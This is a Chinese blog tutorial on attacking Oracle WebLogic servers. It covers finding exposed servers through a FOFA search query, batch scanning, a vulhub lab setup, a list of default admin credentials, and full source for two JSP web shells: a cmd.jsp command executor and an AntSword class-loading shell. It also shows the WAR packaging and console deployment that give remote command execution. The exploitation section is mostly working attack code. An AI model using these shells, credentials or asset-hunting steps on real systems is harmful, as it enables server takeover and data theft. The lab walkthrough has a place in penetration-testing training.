Weblogic漏洞

已于 2022-09-06 22:52:25 修改
阅读量2.3k 收藏 11
点赞数
分类专栏: web 文章标签: java 中间件 网络安全
于 2022-09-05 22:02:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45933944/article/details/126714258
版权

文章目录

Weblogic漏洞

  • 预备知识

中间件定义:中间件(middleware)是基础软件的一大类,属于可复用软件的范畴。顾名思义,中间件处于操作系统软件与用户的应用软件的中间。

中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件

weblogic简介

weblogic是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,确切来说是一个基于JavaEE框架的中间件,它提供了一个现代轻型开饭平台,用于开发,集成,部署和管理大型分布式web应用,网络应用和数据库应用的java应用服务器。将加吧的动态功能和java entrprise标准的安全性引入大型网络应用的开发,集成,部署和管理之中。

Weblogic特征

  1. 默认端口:7001
  2. web界面:Error 404–Not Found
  3. 控制后台:http://ip:7001/console

Weblogic历史漏洞发现

1.获取资产

shodan, fofa, zoomeye等

fofa : app=“BEA-Weblogic-Server”

请添加图片描述

2. 批量扫描脚本

  • WeblogicScan

https://github.com/rabbitmask/WeblogicScan

下载压缩包解压,文件夹中的weblogicscan.py是需要在终端运行的文件

第一步需要执行的命令(安装依赖包):python -m pip install -r requirements.txt

请添加图片描述

3. Weblogic漏洞环境搭建

docker pull vulhub/weblogic:10.3.6.0-2017

docker run -dit -p 7001:7001 vulhub/weblogic:10.3.6.0-2017

请添加图片描述

4. 扫描靶机

python WeblogicScan.py -u 192.168.1.149 -p 7001

请添加图片描述

工具已经扫描出所有的weblogic的漏洞

使用浏览器访问界面

请添加图片描述

Weblogic历史漏洞利用

1.weblogic弱口令

账号:weblogic

密码:Oracle@123

请添加图片描述

Weblogic 默认口令:https://cirt.net/passwords?criteria=weblogic

  1. system/password
  2. weblogic/weblogic
  3. admin/security
  4. joe/password
  5. mary/password
  6. system/security
  7. wlcsystem/wlcsystem
  8. wlpisystem/wlpisystem
  • cmd.jsp

<%@ page import=“java.io.*” %> <% String cmd =
request.getParameter(“cmd”); String output = “”; if(cmd !=
null) { String s = null; try { Process p =
Runtime.getRuntime().exec(cmd); BufferedReader sI = new
BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s +“\r\n”; } }
catch(IOException e) { e.printStackTrace(); } }
out.println(output);%>

2. 命令打包war包

jar -cvf cmd.war cmd.jsp

请添加图片描述

3.部署war包

登录后台,选择部署,进入如下见面

请添加图片描述

上传war包之后,一直下一步就可以完成war包的部署

请添加图片描述

4. GetShell

完成前面的操作后在浏览器上访问

http://192.168.1.149:7001/cmd/cmd.jsp?cmd=ls

请添加图片描述

war包用法

cmd.jsp?cmd=需要执行的命令

  • 例如查看系统当前用户

请添加图片描述

当前上传的脚本war包是简单脚本,无法连接蚁剑去管理

4.1 蚁剑-jsp4ant.jsp
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("ant");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

同理生成war包上传部署

  • 使用蚁剑连接

请添加图片描述

请添加图片描述

Zst4rs
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Java安全]—weblogic常见漏洞
Sentiment的博客
07-11 3443
本来想跟一些T3反序列化的,奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问,进入后台弱口令直接登录weblogic常用弱口令: htt
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3303
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
最新发布
2401_84264662的博客
04-26 929
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 840
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
weblogic漏洞扫描工具 反序列化漏洞扫描工具
qq_44005305的博客
03-16 339
weblogic 漏洞扫描工具 妄想试图weblogic一把梭目前检测的功能console 页面探测 & 弱口令扫描uuid页面的SSRFCVE-2017-10271 wls-wsat页面的反序列化CVE-2018-2628 反序列化后期可以的话还会继续加功能的,主要是一些反序列化的poc真的不好写,我也不咋会..
v1.1!最新版Weblogic漏洞利用工具
潇湘信安的博客
07-16 725
迫于目前现有的weblogic工具没怎么更新、payloay jdk适用版本等问题,所以基于superman18、sp4zcmd等项目,写一个weblogic工具,工具运行版本要求jdk 8,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)。
weblogic 漏洞统计 CVE
09-18
然而,如同任何复杂的软件系统,WebLogic也存在安全漏洞,这些漏洞可能被恶意攻击者利用,对服务器造成严重威胁。以下是所提及的一些CVE(Common Vulnerabilities and Exposures)编号以及它们涉及的安全问题: 1. ...
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
weblogic漏洞补丁
07-03
标题提到的“weblogic漏洞补丁”是指Oracle为WebLogic Server发布的专门修复安全漏洞的更新。在这个特定的案例中,补丁版本号为10.3.6.0.12,这表明它是针对WebLogic Server 10.3.6版本的一个重要安全更新。补丁通常...
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 ...
weblogic 漏洞需要替换的jar包
11-16
weblogic 漏洞需要替换的jar包
weblogic cmd命令漏洞检测
04-08
weblogic中cmd反序列号漏洞检测,必须要求是java8的环境启动,也可以选择对jboos的漏洞,对安全测评来说,比较重要,可以复现漏洞
Weblogic漏洞(一)之 Weblogic基本介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-26 854
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。适用于大型商业项目。
http TRACE 跨站攻击 CVE-2003-1567
CVE-2004-2320
CVE-2010-0386
cuizhijun521521的博客
06-25 3153
http TRACE 跨站攻击 如果webserver支持TRACE 和/或 TRACK 方式。 TRACE和TRACK是用来调试web服务器连接的HTTP方式。支持该方式的服务器存在跨站脚本漏洞,通常在描述各种浏览器缺陷的时候,把"Cross-Site-Tracing"简称为XST。攻击者可以利用此漏洞欺骗合法用户并得到他们的私人信息。解决方案: 禁用这些方式。 什么是“跨站攻击”呢?业界...
记一次weblogic-10.3.6.0靶场漏洞利用
屿的博客
09-15 7363
输入 find ./ -name oracle_logo.gif(文件名)进入Vuln-Range的weblogic-10.3.6.0靶场。(去掉. 去掉图片文件名再自己起一个新的文件名 xx.jsp)进入最开始的/uddiexplorer/下的自命名木马.jsp。删掉端口后面多余字符,输入/uddiexplorer/打印出的工作目录和刚刚保存的gif文件路径拼接在一起。在weblogic工具里使用pwd打印工作目录。连接复制到weblogic的shell上传。找到的路径用记事本保存一下。
深入浅出带你学习weblogic中间件常见漏洞
小陈的博客
02-16 443
WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。可以看到WEBLOGIC的作用还是非常大的,它的特点可以概括为下面五个点:1.标准性,支持多种标准。2.可扩展性,集群能力强。3.开发快,可以快速部署。4.灵活性强。5.可靠性强,安全性高。下面展开来讲weblogic中间件常见的漏洞以及利用方法。
Weblogic 漏洞复现
Knsec
06-03 2619
Weblogic 漏洞复现
weblogic系列漏洞整理————8、WebLogic 两处任意文件上传漏洞动态分析(CVE-2018-2894)
Fly_鹏程万里
11-01 2184
0x01 前言 CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分。鉴于厂商已进行了安全修复,笔者对该漏洞进行了一次分析。WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/co...
探索WebLogic扫描工具:KingKaki的Weblogic-scan
gitblog_00014的博客
03-27 811
探索WebLogic扫描工具:KingKaki的Weblogic-scan 项目地址:https://gitcode.com/kingkaki/weblogic-scan 在网络安全日益重要的今天,对应用程序的漏洞检测成为了一项必不可少的任务。WebLogic,作为Oracle公司的一款企业级应用服务器,其安全性直接影响到大量业务系统的稳定运行。为此,我们想要向您推荐一个名为Weblogic-s...
weblogic漏洞环境搭建
09-09
WebLogic部署项目的步骤如下: 1. 首先,确保你已经有一个要部署的项目包(例如servletDemo.war)。 2. 将项目包(servletDemo.war)拷贝到WebLogic服务器的autodeploy目录下。这样一来,当WebLogic启动时,它会自动部署该项目。 3. 启动WebLogic服务器,可以使用startWeblogic.cmd命令来启动。 4. 随后,你可以通过浏览器访问部署的项目。根据默认的部署路径和端口号,你可以在浏览器的地址栏输入"http://localhost:7001/servletDemo"来访问servletDemo项目。 通过以上步骤,你就可以成功地在WebLogic中部署和访问你的项目了。请注意,这些步骤适用于WebLogic开发模式下的自动部署操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值